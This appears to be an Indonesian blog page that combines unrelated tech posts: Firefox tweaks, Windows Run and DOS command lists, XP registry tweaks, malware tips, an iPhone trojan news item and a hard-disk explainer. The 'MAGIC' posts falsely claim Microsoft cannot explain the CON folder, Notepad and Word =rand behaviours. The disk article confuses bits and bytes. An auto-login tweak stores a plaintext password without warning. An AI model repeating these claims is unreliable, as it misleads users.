Nih sya ada sedikit trik silakan yg ingin mencoba . . .
1. ketik "about:config" pada address bar dan tekan enter. turunkan scroll kebawah dan cari entries berikut :
network.http.pipelining
network.http.proxy.pipelining
network.http.max-connections-per-server
network.http.pipelining.maxrequests
network.http.max-connections
network.http.max-persistent-connections-per-proxy
network.http.max-persistent-connections-per-server
Secara normal browser akan membuat satu request untuk satu halaman web dalam satu kali . ketika kamu enable pipelining, itu akan membuat beberapa halaman dalam sekali. dan akan mempercepat page loading
2. rubah entries berikut menjadi :
Set "network.http.pipelining" menjadi "true"
Set "network.http.proxy.pipelining" menjadi "true"
set "network.http.max-connections-per-server" menjadi 32.
set "network.http.max-connections" menjadi 60.
set "network.http.max-persistent-connections-per-proxy" menjadi 16.
set "network.http.max-persistent-connections-per-server" menjadi 8.
set "network.http.pipelining.maxrequests" menjadi nilai seperti "30".
3.klik kiri (dimana saja) select New-> Integer. masukan "nglayout.initialpaint.delay" pada prefence name, kemudia set nilai menjadi "0".
klik kiri sekali lagi (dimana saja) select New-> boolean. masukan "browser.tabs.showSingleWindowModePrefs" set menjadi "true"
semoga membantu....
Perintah dalam RUN :
compmgmt.msc - Computer management
devmgmt.msc - Device manager
diskmgmt.msc - Disk management
dfrg.msc - Disk defrag
eventvwr.msc - Event viewer
fsmgmt.msc - Shared folders
gpedit.msc - Group policies
lusrmgr.msc - Local users and groups
perfmon.msc - Performance monitor
rsop.msc - Resultant set of policies
secpol.msc - Local security settings
services.msc - Various Services
msconfig - System Configuration Utility
regedit - Registry Editor
msinfo32 - System Information
sysedit - System Edit
win.ini - windows loading information(also system.ini)
winver - Menampilkan versi Windows
mailto: - Membuka email client default
command - Membuka DOS command prompt
Perintah2 dalam RUN untuk mengakses Control Panel:
appwiz.cpl - Add/Remove Programs control
timedate.cpl - Date/Time Properties control
desk.cpl - Display Properties control
findfast.cpl - FindFast control
inetcpl.cpl - Internet Properties control
main.cpl keyboard - Keyboard Properties control
main.cpl - Mouse Properties control
mmsys.cpl - Multimedia Properties control
netcpl.cpl - Network Properties control
password.cpl - Password Properties control
mmsys.cpl sounds - Sound Properties control
sysdm.cpl - System Properties control
Perintah dalam RUN:
Perintah2 dalam DOS Command Prompt:
ANSI.SYS Defines functions that change display graphics, control cursor movement, and reassign keys.
APPEND Causes MS-DOS to look in other directories when editing a file or running a command.
ARP Displays, adds, and removes arp information from network devices.
ASSIGN Assign a drive letter to an alternate letter.
ASSOC View the file associations.
AT Schedule a time to execute commands or programs.
ATMADM Lists connections and addresses seen by Windows ATM call manager.
ATTRIB Display and change file attributes.
BATCH Recovery console command that executes a series of commands in a file.
BOOTCFG Recovery console command that allows a user to view, modify, and rebuild the boot.ini
BREAK Enable / disable CTRL + C feature.
CACLS View and modify file ACL's.
CALL Calls a batch file from another batch file.
CD Changes directories.
CHCP Supplement the International keyboard and character set information.
CHDIR Changes directories.
CHKDSK Check the hard disk drive running FAT for errors.
CHKNTFS Check the hard disk drive running NTFS for errors.
CHOICE Specify a listing of multiple options within a batch file.
CLS Clears the screen.
CMD Opens the command interpreter.
COLOR Easily change the foreground and background color of the MS-DOS window.
COMP Compares files.
COMPACT Compresses and uncompress files.
CONTROL Open control panel icons from the MS-DOS prompt.
CONVERT Convert FAT to NTFS.
COPY Copy one or more files to an alternate location.
CTTY Change the computers input/output devices.
DATE View or change the systems date.
DEBUG Debug utility to create assembly programs to modify hardware settings.
DEFRAG Re-arrange the hard disk drive to help with loading programs.
DEL Deletes one or more files.
DELETE Recovery console command that deletes a file.
DELTREE Deletes one or more files and/or directories.
DIR List the contents of one or more directory.
DISABLE Recovery console command that disables Windows system services or drivers.
DISKCOMP Compare a disk with another disk.
DISKCOPY Copy the contents of one disk and place them on another disk.
DOSKEY Command to view and execute commands that have been run in the past.
DOSSHELL A GUI to help with early MS-DOS users.
DRIVPARM Enables overwrite of original device drivers.
ECHO Displays messages and enables and disables echo.
EDIT View and edit files.
EDLIN View and edit files.
EMM386 Load extended Memory Manager.
ENABLE Recovery console command to enable a disable service or driver.
ENDLOCAL Stops the localization of the environment changes enabled by the setlocal command.
ERASE Erase files from computer.
EXIT Exit from the command interpreter.
EXPAND Expand a M*cros*ft Windows file back to it's original format.
EXTRACT Extract files from the M*cros*ft Windows cabinets.
FASTHELP Displays a listing of MS-DOS commands and information about them.
FC Compare files.
FDISK Utility used to create partitions on the hard disk drive.
FIND Search for text within a file.
FINDSTR Searches for a string of text within a file.
FIXBOOT Writes a new boot sector.
FIXMBR Writes a new boot record to a disk drive.
FOR Boolean used in batch files.
FORMAT Command to erase and prepare a disk drive.
FTP Command to connect and operate on a FTP server.
FTYPE Displays or modifies file types used in file extension associations.
GOTO Moves a batch file to a specific label or location.
GRAFTABL Show extended characters in graphics mode.
HELP Display a listing of commands and brief explanation.
IF Allows for batch files to perform conditional processing.
IFSHLP.SYS 32-bit file manager.
IPCONFIG Network command to view network adapter settings and assigned values.
KEYB Change layout of keyboard.
LABEL Change the label of a disk drive.
LH Load a device driver in to high memory.
LISTSVC Recovery console command that displays the services and drivers.
LOADFIX Load a program above the first 64k.
LOADHIGH Load a device driver in to high memory.
LOCK Lock the hard disk drive.
LOGON Recovery console command to list installations and enable administrator login.
MAP Displays the device name of a drive.
MD Command to create a new directory.
MEM Display memory on system.
MKDIR Command to create a new directory.
MODE Modify the port or display settings.
MORE Display one page at a time.
MOVE Move one or more files from one directory to another directory.
MSAV Early M*cros*ft Virus scanner.
MSD Diagnostics utility.
MSCDEX Utility used to load and provide access to the CD-ROM.
NBTSTAT Displays protocol statistics and current TCP/IP connections using NBT
NET Update, fix, or view the network or network settings
NETSH Configure dynamic and static network information from MS-DOS.
NETSTAT Display the TCP/IP network protocol statistics and information.
NLSFUNC Load country specific information.
NSLOOKUP Look up an IP address of a domain or host on a network.
PATH View and modify the computers path location.
PATHPING View and locate locations of network latency.
PAUSE Command used in batch files to stop the processing of a command.
PING Test / send information to another network computer or network device.
POPD Changes to the directory or network path stored by the pushd command.
POWER Conserve power with computer portables.
PRINT Prints data to a printer port.
PROMPT View and change the MS-DOS prompt.
PUSHD Stores a directory or network path in memory so it can be returned to at any time.
QBASIC Open the QBasic.
RD Removes an empty directory.
REN Renames a file or directory.
RENAME Renames a file or directory.
RMDIR Removes an empty directory.
ROUTE View and configure windows network route tables.
RUNAS Enables a user to execute a program on another computer.
SCANDISK Run the scandisk utility.
SCANREG Scan registry and recover registry from errors.
SET Change one variable or string to another.
SETLOCAL Enables local environments to be changed without affecting anything else.
SETVER Change MS-DOS version to trick older MS-DOS programs.
SHARE Installs support for file sharing and locking capabilities.
SHIFT Changes the position of replaceable parameters in a batch program.
SHUTDOWN Shutdown the computer from the MS-DOS prompt.
SMARTDRV Create a disk cache in conventional memory or extended memory.
SORT Sorts the input and displays the output to the screen.
START Start a separate window in Windows from the MS-DOS prompt.
SUBST Substitute a folder on your computer for another drive letter.
SWITCHES Remove add functions from MS-DOS.
SYS Transfer system files to disk drive.
TELNET Telnet to another computer / device from the prompt.
TIME View or modify the system time.
TITLE Change the title of their MS-DOS window.
TRACERT Visually view a network packets route across a network.
TREE View a visual tree of the hard disk drive.
TYPE Display the contents of a file.
UNDELETE Undelete a file that has been deleted.
UNFORMAT Unformat a hard disk drive.
UNLOCK Unlock a disk drive.
VER Display the version information.
VERIFY Enables or disables the feature to determine if files have been written properly.
VOL Displays the volume information about the designated drive.
XCOPY Copy multiple files, directories, and/or drives from one location to another.
TRUENAME When placed before a file, will display the whole directory in which it exists
TASKKILL It allows you to kill those unneeded or locked up applications
Beberapa tips dan registry dibawah ini cuma berlaku buat Windows XP. Sebelum mengutak-atik Registry, ada baiknya melakukan backup terlebih dahulu.
1. Klik tombol Start > Run.
2. Ketik regedit dan tekan Enter setelah berada didalam jendela Run.
3. Didalam Registry Editor, pilih menu File > Export.
4. Setelah Export Registry File muncul, masukkan nama file ke bagian File Name, misalnya backup-registry dan sebagainya.
5. tekan tombol Save.
Mempercepat Update Registry
Tekan tombol Start > Log Off > Log Off.
Mengganti Wallpaper
HKEY_CURRENT_USER/Control Panel/Desktop
Klik ganda pada wallpaper dan masukkan path gambar yang diinginkan pada Value Data.
Mengganti Nama Recycle Bin
HKEY_CLASSES_ROOT/CLSID/{645FF040-5081-101B-9F08-00AA002F954E}
Klik ganda pada option (Default value) dan beri nama bare sesuai yang diinginkan pada Value Data.
Memunculkan Rename Pada Recycle Bin
HKEY_CLASSES_ROOT/CLSID/{645FF040-5081-101B-9F08-00AA002F954E}/ShellFolder
Klik ganda pada Attributes > Edit Binary Value. Pada Value Data, ganti angka tersebut menjadi 0000 50 01 00 20.
Menyembunyikan Recycle Bin
HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/Explorer/Desktop/NameSpace
Hapus subkey {645FF040-5081-101B-9F08-00AA002F954E}, kemudian Restart komputer untuk melihat hasilnya.
Untuk memunculkannya kembali, buat kembali kombinasi angka
{645FF040-5081-101B-9F08-00AA002F954E}.
Menambah Isi Shortcut Menu Pada Recycle Bin
HKEY_CLASSES_ROOT/CLSID/{645FF040-5081-101B-9F08-00AA002F954E}/ShellFolder
Klik ganda Attributes dan ganti angka di Value Data dengan angka berikut ini:
0000 50 01 00 20 > Rename
0000 60 01 00 20 > Delete
0000 70 01 00 20 > Rename & Delete
0000 41 01 00 20 > Copy
0000 42 01 00 20 > Cut
0000 43 01 00 20 > Copy & Cut
0000 44 01 00 20 > Paste
0000 45 01 00 20 > Copy & Paste
0000 46 01 00 20 > Cut & Paste
0000 47 01 00 20 > Cut, Copy & Paste
Menambah Isi Shortcut Menu Pada Recycle Bin Dengan Menu Pilihan
HKEY_CLASSES_ROOT/CLSID/{645FF040-5081-101B-9F08-00AA002F954E}/Shell
Klik menu Edit > New > Key dan beri nama yang diinginkan (Misalnya: Go To Windows Explorer).
Dibawah key yang baru tersebut, tekan lagi menu Edit > New > Key dan buat sebuah key baru bernama Command. Klik ganda option (Default), dan pada bagian Value Data, isi dengan path Windows Explorer ( C:\WINDOWS\Explorer.exe).
Mengembalikan Folder Documents Yang Hilang Di My Computer
HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/Explorer/DocFolderPaths
Pilih menu Edit > New > String Value dan beri nama sesuai dengan username yang digunakan di Windows (contohnya: Chippers) Klik ganda pada value tersebut dan masukkan path tempat dimana Documents anda berada (contohnya D:\Documents)
Menyingkirkan File Stored Dari My Computer
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Explorer/MyComputer/NameSpace/DelegateFolders
Hapus subkey {59031a47-3f72-44a7-89c5-5595fe6b30ee} dengan menekan tombol Del.
Menyembunyikan My Recent Documents
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer
Klik menu Edit > New > DWORD Value dan beri nama NoRecentDocsMenu.
Kemudian klik ganda pada DWORD Value tersebut, dan berikan angka 1 untuk mengaktifkannya.
Menyembunyikan Menu Find
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer
Klik menu Edit > New > DWORD Value dan beri nama NoFind.
Kemudian klik ganda pada DWORD Value tersebut dan berikan angka 1 untuk mengaktifkannya. Restart komputer.
Menyembunyikan Help And Support
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer
Buatlah sebuah DWORD Value baru - Menu Edit > New > DWORD Value, dan beri nama NoSMHelp.
Kemudian klik ganda pada NoSMHelp dan isi dengan angka 1 pada Value Data. Restart komputer.
Menyembunyikan Menu Run
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer
Buat sebuah DWORD Value baru dan beri nama NoRun. Klik ganda dan masukkan angka 1 sebagai Value Data.
Menyembunyikan Menu Run Dari Start Menu (2)
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer/Advanced
Cari value bernama Start_ShowRun, klik ganda dan masukkan angka 0 pada bagian Value Data.
Menyembunyikan Log Off
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer
Klik menu Edit > New > Binary Value dan beri nama NoLogOff.
Klik ganda pada NoLogOff dan masukkan angka 01 00 00 00 pada bagian Value Data.
Menyembunyikan Menu Turn Off Computer
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer
Klik menu Edit > New > DWORD Value dan beri nama NoClose.
Klik ganda NoClose dan beri angka 1 pada Value Data.
Cleartype Pada Logon Screen
HKEY_USERS/.DEFAULT/Control Panel/Desktop
Klik ganda FontSmoothingType dan masukkan angka 2 pada Value Data.
Membuat Tampilan Berbeda Pada Jendela Logon
HKEY_USERS/.DEFAULT/Software/Microsoft/Windows/CurrentVersion/ThemeManager
Klik ganda ColorName dan masukkan teks Metallic pada Value Data.
Menampilkan Administrator Di Welcome Screen
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserLis t
Buat sebuah DWORD Value baru dan beri nama Administrator.
Klik ganda Administrator dan masukkan angka 1 pada Value Data.
Login Otomatis
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows
NT/CurrentVersion/Winlogon
Klik ganda AltDefaultUserName dan masukkan username account yang dipilih.
Klik ganda AutoAdminLogon dan masukkan angka 1 pada Value Data.
Buat sebuah DWORD Value baru dan beri nama DefaultPassword.
Klik ganda DefaultPassword dan masukkan password account yang dipilih pada Value Data.
Menyembunyikan Menu My Pictures Dari Start Menu
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer/Advanced
Klik ganda pada Start_ShowMyPics dan masukkan angka 0 pada bagian Value Data.
Memunculkan Menu Administrative Tools
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer/Advanced
Klik ganda pada StartMenuAdminTools dan berikan angka 1 pada Value Data.
Memperkecil Ikon Start Menu
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer/Advanced
Klik ganda pada Start_LargeMFUIcons dan masukkan angka 1 pada Value Data.
Menghilangkan Username Pada Start Menu
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Pilih Edit > New > DWORD Value dan beri nama NoUserNameInStartMenu.
Klik ganda NoUserNameInStartMenu dan masukkan angka 1 pada Value Data.
Mencegah Perubahan Menu Start
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer
Buat sebuah DWORD Value baru dan beri nama NoChangeStartMenu.
Klik ganda NoChangeStartMenu dan masukkan angka 1 pada Value Data.
Menyembunyikan My Recent Documents
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer/Advanced
Klik ganda pada Start_ShowRecentDocs dan masukkan angka 0 pada Value Data.
Mengubah Nama Default Shortcut Penting Di Desktop
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer/CLSID
Klik ganda pada default value pada masing-masing subkey di bawah ini:
My Network Places:
{208D2C60-3AEA-1069-A2D7-08002B30309D}
My Computer:
{20D04FE0-3AEA-1069-A2D8-08002B30309D}
My Documents:
{450D8FBA-AD25-11D0-98A8-0800361B1103}
Recycle Bin:
{645FF040-5081-101B-9F08-00AA002F954E}
Default IE Icon:
{871C5380-42A0-1069-A2EA-08002B30309D}
masukkan nama-nama unik sebagai pengganti nama defaultnya.
Menyembunyikan Ikon Di Desktop
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer/Advanced
Klik ganda pada HideIcons dan masukkan angka 1 pada Value Data.
Membersihkan Semua Ikon Pada Desktop
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer
Buat sebuah DWORD Value baru dan beri nama NoDesktop.
Klik ganda pada NoDesktop dan masukkan angka 1 pada Value Data.
Membuat Desktop Lebih Stabil
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer
Buat sebuah DWORD Value baru dan beri nama DesktopProcess.
Klik ganda DesktopProcess dan masukkan angka 1 pada Value Data.
Menghapus Daftar Program Dalam Menu Run
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer/RunMRU
Di jendela sebelah kanan, akan terlihat deretan software-software (ditandai secara alphabet a, b, c, d, dan seterusnya).
Untuk menghapusnya, cukup dengan memilih salah satu (atau semua) nama program yang ada dan tekan tombol Del.
Jika muncul jendela konfirmasi untuk penghapusan data, tekan Yes.
Membersihkan Recent Documents
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer
Buat sebuah DWORD Value baru dan beri nama NoRecentDocsHistory.
Klik ganda pada NoRecentDocsHistory dan masukkan angka 1 pada bagian Value Data.
Menghilangkan Info Tip Pada Ikon Folders Di Desktop
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer/Advanced
Klik ganda pada FolderContentsInfoTip dengan angka 0.
Mengunci Taskbar
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer/Advanced
Klik ganda pada TaskBarSizeMove dan masukkan angka 0 pada Value Data.
Menghapus Past Items Icons Pada Taskbar
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\TrayNotify Hapus IconStreams dan PastIconsStream, kemudian buka Task
Manager, pada Tab Processes klik kanan pada explorer.exe dan pilih End Process.
Klik menu File > New Task (Run) dan ketikan kembali explorer dan tekan OK.
Menyembunyikan System Tray
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Jika key Explorer belum ada buatlah sebuah DWORD Value bare dan beri nama NoTrayItemsDisplay.
Klik ganda NoTrayItemsDisplay dan masukkan angka 1 pada Value Data.
Untuk mengembalikan System Tray masukkan angka 0 pada Value Data.
Menonaktifkan Klik-kanan Pada Desktop
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer
Buat sebuah DWORD Value baru dan beri nama NoViewContextMenu.
Klik ganda pada NoViewContextMenu dan masukkan angka 1 pada Value Data.
Mengubah Waktu Delay Ketika Membuka Menu
HKEY_CURRENT_USER/Control Panel/Desktop
Klik ganda pada MenuShowDelay dan ubah angka milidetik yang semula 400 menjadi angka lain. Semakin kecil semakin cepat.
Mengatur Ukuran Ikon Di Desktop Dan Start Menu
HKEY_CURRENT_USER/Control Panel/Desktop/WindowMetrics
Klik ganda pada Shell Icon Size dan ubah angka 32 menjadi angka lainnya, misalnya 10.
Mengganti Warna Windows
HKEY_CURRENT_USER/Control Panel/Colors
Klik ganda Window dan masukkan kombinasi warna RGB (gunakan
Adobe PhotoShop untuk menemukan kombinasi warna yang sesuai).
Mengganti Warna Teks Dalam Windows
HKEY_CURRENT_USER/Control Panel/Colors
Klik ganda WindowText dan masukkan kombinasi warna RGB.
Menghilangkan Tab Screen Saver
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/System
HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/Policies/System
Buat sebuah DWORD Value baru dan beri nama NoDispScrSavPage.
Klik ganda NoDispScrSavPage dan masukkan angka 1 pada Value Data.
Mengganti Screen Saver Lewat Registry
HKEY_CURRENT_USER/Control Panel/Desktop
Klik ganda SCRNSAVE.EXE kemudian masukkan path tempat file Screen Saver yang diinginkan. Contoh: C:\WINDOWS\ScreenSaver.scr
Tips Mencegah Virus. . .
Eh Malware deh. . .
• Selalu update sistem operasi dan berbagai program.
• Instal AntiVirus dan AntiSpyware yang secara aktif melakukan scan.
• Update AntiVirus dan AntiSpyware agar malware terbaru dapat dikenali dan ditangani.
• Jangan download sembarang file apalagi kalau sumbernya tidak meyakinkan.
• Jangan gunakan media penyimpanan, seperti flash disk atau hard disk eksternal, yang sudah digunakan di komputer lain, Boleh saja kalau yakin komputer lain itu bebas malware.
• Jagan buka lampiran e-mail yang berekstensi EXE,COM,VBS,BAT, dan ekstensi lain yang diboncengi virus.
• Sebelum dijalankan,scan semua file yang diperoleh dari internet.
Sekarang saya ingin membahas tentang bedanya antara ANTIVIRUS & ANTISPYWARE. Banyak orang yang mengira bahwa Spyware dan Virus itu sama tetapi sebenarnya itu berbeda. Mungkin ini terjadi karena kesalahan istilah.. . Virus dan spyware adalah dua hal yang berbeda. Memang keduanya sama-sama termasuk Malware, yakni peranti lunak yang dibuat untuk kepentingan yang “enggak-enggak”. Tetapi dalam definisi keduanya berbeda. Yaudah mari saya jelaskan. . .. .
Virus dibuat untuk merusak sistem tetapi bukan perangkat keras yah. Virus bisa memperbanyak diri, kemudian secara jor-joran menggunakan memori sehingga komputer jadi hang.
Spyware tidak dibuat untuk merusak sistem. Spyware dibuat untuk memata-matai pengguna komputer. Seorang pengguna komputer bisa kecolongan nomor kartu kredit dan password akibat spyware. Informasi itu akan dikirim ke pemilik spyware dan pemilik spyware akan menggunakan informasi itu untuk kepentingan dirinya sendiri.
Sayangnya , istilah “virus” dipakai untuk semua malware. Jadi orang banyak beranggap kalau ia menginstal antivirus, ia bakal aman dari semua malware. Makanya, ketika spyware yang menyerang, mereka menganggap antivirusnya kurang hebat.
Beberapa pembuat antivirus akhirnya agak mengikuti kesalahan penggunaan istilah itu. Selain untuk membasmi virus, kebanyakan antivirus bisa digunakan untuk membasmi Trojan dan worm. Istilah “virus” berlaku untuk Trojan,worm,dan virus. Nah kalau antispyware dibuat khusus untuk membasmi spyware, tidak untuk malware yang lain.
Cara kerja keduanya memang mirip. Antivirus maupun antispyware sama-sama mencari pola. Antivirus mencari pola yang digunakan oleh Trojan,worm dan virus, sedangkan antispyware mencari pola yang digunakan spyware. Virus dan spyware punya “gerakan” tertentu saat melakukan serangan. Kalau ada program yang “ bergerak” layak virus atau malware, program itu akan dituduh, bahkan dihentikan kerjanya.
Supaya lebih kuat,antivirus biasanya juga dilengkapi dengan dpyware, begitu juga sebaliknya. Tapi banyak ahli di bidang malware bilang sebaiknya instal program yang lebih spesifik. Dengan kata lain , Instal antivirus, instal juga antispyware.
MAGIC #1
Orang India menemukan bahwa tidak ada seorang pun yang dapat membuat FOLDER di komputer dengan program Microsoft manapun dengan judul folder "CON". Ini merupakan hal nyata dan seluruh kru Microsoft sendiri tidak dapat menjawabnya kenapa hal ini bisa terjadi. Cobalah dengan membuat sebuah folder dengan nama CON atau con.
Bukalah My Document -> File -> New -> Folder -> ketik CON atau Con atau con
Apa yang terjadi?
MAGIC #2
Bagi anda para pengguna Windows, lakukanlah hal berikut ini:
1) Buka sebuah notepad file kosong
2) Ketiklah "Bush hid the facts" (tanpa tanda kutip ya)
3) Save di mana pun anda suka
4) Tutuplah dan bukalah kembali file tersebut.
Aneh bukan?
MAGIC #3:
Cobalah hal yang menarik ini, sungguh aneh! Bahkan Bill Gates sendiri tidak menemukan jawabannya kenapa ini bisa terjadi! Hal ini ditemukan oleh orang Brazil. Cobalah!
1)Buka program Microsoft Word dan ketik: =rand (200, 99)
2) kemudian anda ENTER
Apa yang anda temukan? Menarik bukan? coba aja.....
Sumber : Berbagai sumber
Trojan horse yang menyamar sebagai paket upgrade firmware yang menghilangkan beberapa file penting iPhone rupanya hasil kreasi seorang hacker cilik. Bocah berusia 11 tahun itu berhasil membuat trojan untuk iPhone, sebuah file jahat yang menyamar sebagai update firmware untuk iPhone.
Pengguna iPhone berpotensi terinfeksi trojan yang menyamar sebagai sebuah tool untuk meng-upgrade iPhone. Perusahaan keamanan Symantec mengidentifikasi trojan itu sebagai "iPhone firmware 1.1.3 prep".
Dalam blognya, peneliti keamanan Symantec Orla Cox mengatakan bahwa saat diinstal, program tersebut tidak berefek banyak pada iPhone. Kerusakan yang ditimbulkan bukan pada saat trojan itu terinstal, tapi ketika user mencoba me-remove malware tersebut. Trojan tersebut akan menghapus sejumlah file resmi yang ada di iPhone.
Berkaitan dengan hal tersebut, administrator situs independen publikasi iPhone, Modmyifone, mengklaim sudah mengumumkan peringatan terkait ancaman trojan tersebut dan melacak pembuatnya. Mereka bahkan telah menghubungi orangtua sang bocah dan menutup situs yang meng-hosting trojan tersebut.
Di lain sisi, Apple menyatakan tidak akan bertanggung jawab terhadap kerusakan yang ditimbulkan program pihak ketiga itu. Apple juga mengaku tidak akan mengambil langkah khusus apapun terhadap iPhone yang terinfeksi, karena memang program tersebut bukan dirilis oleh Apple.
Sementara itu perusahaan keamanan mewanti-wanti agar pengguna iPhone berhati-hati saat menginstal program dari pihak ketiga di ponsel. "Saat ini ada anak 11 tahun 'bermain-main' dengan file XML dengan membuat trojan. Ke depannya bisa saja ada seseorang yang memiliki skill lebih dan target tertentu," tandas chief research officer F-Secure, Mikko Hypponen.
McAfee merekomendasikan agar pengguna iPhone hanya menginstal update firmware resmi saja dan hanya men-download file dari situs terpercaya saja.
Sumber: www.detikinet.com
Dalam perangkat keras komputer, pasti kita kenal dan sangat akrab dengan yang namanya hard disk sebagai media untuk menyimpan (storage) data. Hard disk adalah salah satu komponen di dalam Hard Disk Drive (HDD). Sebuah hard disk berfungsi untuk menyimpan informasi (data) dengan menempatkan sebuah medan magnetik melalui permukaan sebuah disk berlapis material bermagnet yang bergerak . Sebuah hard disk menyimpan data digital sebagai titik mangetik pada permukaan sebuah disk yang disebut bit. Sebuah bit (dimana data akan dikomposisikan sebagai bit) menyatakan nilai 0 saat disk dimagnetisasi pada satu arah, dan bernilai 1 bila arahnya berlawanan. Jadi perubahan arah magnetic pada setiap bit akan diterjemahkan sebagai kombinasi 0 dan 1. Satu bit akan menyimpan satu informasi dalam bentuk angka biner kombinasi 1 dan 0. Dalam Hard Disk Drive (HDD) ada 3 komponen utama :
1. Hard disk atau platter (pelat/disk metal)
2. Write-core head adalah salah satu perangkat perekam untuk menulis data
3. GMR read-sensor head untuk membaca data dari setiap permukaan platter.
Hard disk memposisikan dua buah head (penulis dan pembaca), bergantung sebuah lengan yang dapat bergerak, dengan jarak 10 nanometer di atas permukaan platter pada tiap sisinya.
Gambar 2. Hard disk drive (HDD) generasi pertama dan sekarang
Sejarah hard disk drive (HDD)
Hard disk drive (HDD) pertama kali dibuat dan diproduksi oleh IBM company pada tahun 1956 yang selanjutnya dikenal sebagai HDD generasi pertama (gambar. 2). HDD berlabel RAMAC 305 ini mempunyai kapasitas 5 Mega Bits (MB) atau 5.000.000 bits. Artinya RAMAC 305 hanya bisa menyimpan 5 juta
informasi. Pada tahun 2004, Toshiba company mengeluarkan hard disk drive berlabel HDD-0.85 inchi. HDD yang berukuran kurang dari 1 inchi ini mempunyai kapasitas 4 Giga Bits (GB) atau 4 milyar bits, dan menjadi HDD terkecil di dunia.
Kapasitas hard disk
Kapasitas hard disk adalah salah satu spesifikasi komputer yang menentukan harga komputer. Bisanya dalam satu HDD terdapat beberapa lempeng platter atau hard disk yang menunjukkan total kapasitas hard disk komputer. Dalam dunia ilmiah, kapasitas hard disk biasanya ditulis dalam satuan density (kerapatan) kapasitas hard disk yang disingkat BPSI (Bits per square inch) atau jumlah bit tiap 1 inchi persegi.
Secara umum perkembangan teknologi pada hard disk terbagi menjadi dua hal, yaitu ukuran yang semakin kecil dan kapasitas hard disk yang semakin besar. Pada tahun 2004, kapasitas hard disk di pasaran menembus angka 70 GB/square-inch. Artinya 140 GB atau 140 milyar informasi bisa disimpan dalam 1 lempeng (platter) hard disk yang mempunyai luas 2 inchi persegi. Dari kapasitas tersebut bisa diproduksi HDD berkapasitas beberapa ratus GB. Karena biasanya dalam satu HDD terdiri dari beberapa lempeng hard disk.
Teknologi hard disk
Kapasitas hard disk (dalam Bits/inchi-persegi) sangat tergantung pada ukuran bit. Contoh, untuk memproduksi hard diks berkapasitas 250 GB/inchi-persegi, diperlukan bit dengan ukuran kurang lebih 50 nanometer. Artinya, peningkatan kapasitas hard disk bisa didapat dengan memperkecil ukuran bit.
Seperti yang telah ditulis di atas bahwa informasi (kombinasi angka biner 0 atau 1) berasal dari orientasi arah magnetic pada setiap bit. Perubahan (fluktuasi) arah magnetic pada bit akan menimbukan perubahan informasi. Agar informasi yang tersimpan tetap “terjaga” secara permanen dan hanya bisa berubah kalau dibaca atau dihapus, maka tidak boleh ada fluktuasi arah magnetic (magnetic orientation) pada bit dengan sendirinya. Untuk itu, secara fisika 1 bit harus terdiri dari puluhan bulir magnetic atau magnetic grain, dimana dari beberapa magnetic grain tersebut akan muncul resultant magnetic orientation pada satu arah tertentu. Jadi untuk memperkecil ukuran bit, dan tetap menjaga jumlah magnetic grain dalam satu bit, kapasitas hard disk besar hanya bisa didapat dengan memperkecil ukuran magnetic grain pada material hard disk. Hard disk yang beredar di pasaran saat ini terbuat dari material seperti Co-based material, Fe-based material, Pt-based material, dan mempunyai magnetic grain berukuran kisaran 20 – 30 nanometer. Untuk mendapatkan hard disk dengan kapasitas 1 TeraBits/inchi-persegi atau 1,000,000,000,000 informasi di setiap 1 inchi-persegi, dibutuhkan bit berukuran kurang dari 20 nanometer. Dan ini hanya bisa diperoleh dari material yang mempunyai magnetic grain berukuran kurang dari 3 nanometer. Tapi masalah terbesar adalah menyangkut pada titik yang disebut batas super-paramagnetik, dimana jika ukuran magnetic grain sangat kecil fluktuasi termodinamik pada setiap magnetic grain dapat berakibat berfluktuasinya magnetic orientation pada bit dan menyebabkan data akan berubah atau hilang dengan sendirinya. Meskipun begitu, para penggiat dan pemerhati teknologi hard disk tetap optimis bahwa masa depan industri hard disk tetap cerah. Salah satu pendekatannya adalah dengan menggunakan teknologi nano-material atau nano-disk. Perkembangan nano-teknologi terutama pada industri semiconductor memberikan inspirasi bagi pemerhati hard disk untuk mencari solusi pada permasalahan di atas.
Sumber : Http://www.desiran.blogspot.com
1 TINGGALKAN E-MAIL DI SERVER
